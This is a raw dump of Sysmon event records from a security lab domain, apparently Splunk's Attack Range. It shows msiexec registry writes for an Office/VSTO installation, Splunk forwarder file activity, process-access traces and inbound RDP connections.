13241300x800000000000000072558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:56:05.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\SystemFileAssociations\.vsto\shell\open\command\(Default)rundll32.exe "c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll",InstallVstoSolution %%1 13241300x800000000000000072554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:56:05.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\SystemFileAssociations\.vsto\shell\edit\command\(Default)notepad.exe %%1 13241300x800000000000000072553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:56:05.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\bootstrap.vsto.1\shell\open\command\(Default)rundll32.exe "c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll",InstallVstoSolution %%1 23542300x800000000000000072552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:05.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-journalMD5=AFABC5875A6D619EF3A3F838EFD57A1D,SHA256=48FCAC753D89E30A050871979F296E44B4BCAD39A51ACC5F47C6484023D1F010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:05.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-journalMD5=E9FDFDA4F40F6BF17CB6A7E830DB66E9,SHA256=403E0360324C90AE6B89B2A19C66E36A3640CB993F5AD5A3147DD7F183EBF822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049961Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:05.654{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF245490F0BB107FA579165110BC28C2,SHA256=14DAFF04EC43543A9DB714594216D856A4E47C95ADCC335B21444FCF924AA76F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049960Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:05.248{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE96C5D9897EA2FFC6E1E106B7562214,SHA256=092942CD2AC7D4B956C8AF9C2230DAD8E138868F8EEA5EB8F50D85D59AF72AF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:05.147{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12389-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049963Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:06.657{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AADBAD3FB6FE3721E53B001EC4C7058,SHA256=B24A8E17A76C6E9A276BD6EFB4FF9F66AE6F94DBBA9937558A94BC9D757638D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049962Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:03.673{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64497-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0E4TZ04QXN\System.Core.ni.dll.auxMD5=B4E398E15608DCB07F1486AB39A3E46C,SHA256=3EF6CC8395192E32A8C2176D8BD0F7100312E12F0DB88CAF5CD329862B015D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0E4TZ04QXN\System.Core.ni.dllMD5=E5EE25E4B6D6DB3EEC31B05A37819267,SHA256=5250251530332F00CFA4A4D4E52C3A3A94E2302C34019F133834119F5DC7CC55,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:06.226{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57516-false10.0.1.12-8000- 10341000x800000000000000072613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.469{A7A01FEF-EB87-607E-A20B-00000000BB01}60685540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000072612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIA2E6.tmpMD5=85C03E236D63A5C3DE41B6BCB457EA0C,SHA256=AEB30AA394D0A057AA919C2DF3ABEE1DFDEC55A3C1765AD906D486B6CE692E50,IMPHASH=498DF585AEB91C1602F9486FAB464874truetrue 10341000x800000000000000072611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.422{A7A01FEF-EB87-607E-A30B-00000000BB01}68961628c:\Windows\System32\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\Windows\System32\MsiExec.exe+6bca|c:\Windows\System32\MsiExec.exe+7166|c:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.407{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB87-607E-A30B-00000000BB01}6896c:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.375{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.375{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.375{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.375{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.375{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB87-607E-A30B-00000000BB01}6896c:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14005220C:\Windows\system32\msiexec.exe{A7A01FEF-EB87-607E-A30B-00000000BB01}6896c:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.386{A7A01FEF-EB87-607E-A30B-00000000BB01}6896C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\Windows\System32\MsiExec.exe -Embedding 8965A71BA1B1F58E67CEE932DA9CA2D8 E Global\MSI0000C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 10341000x800000000000000072602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB87-607E-A20B-00000000BB01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB87-607E-A20B-00000000BB01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB87-607E-A20B-00000000BB01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.299{A7A01FEF-EB87-607E-A20B-00000000BB01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000072594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:07.297{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34BFDD39772E7CD6E59CD3A238A37358,SHA256=A68E26E6C99A2C33B0F9B3993C195B93A430B53BAD63F0BB562E0189FD6FE57D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:07.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\URLUpdateInfo(Empty) 13241300x800000000000000072592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:56:07.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\PublisherMicrosoft Corporation 13241300x800000000000000072591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:07.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\InstallSourcec:\program files\microsoft office\root\integration\ 13241300x800000000000000072590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:07.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\VSTO 4.0\TypesSupportedDWORD (0x00000001) 13241300x800000000000000072589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:07.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\VSTO 4.0\EventMessageFilec:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll 13241300x800000000000000072588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:07.235{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\vstoee.dll\UseURLDWORD (0x00000001) 13241300x800000000000000072587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{F09D237B-3FD1-4900-BEF2-3471CA68142D}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{64654B35-A024-4807-89D3-C6FDB5A260C7}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft 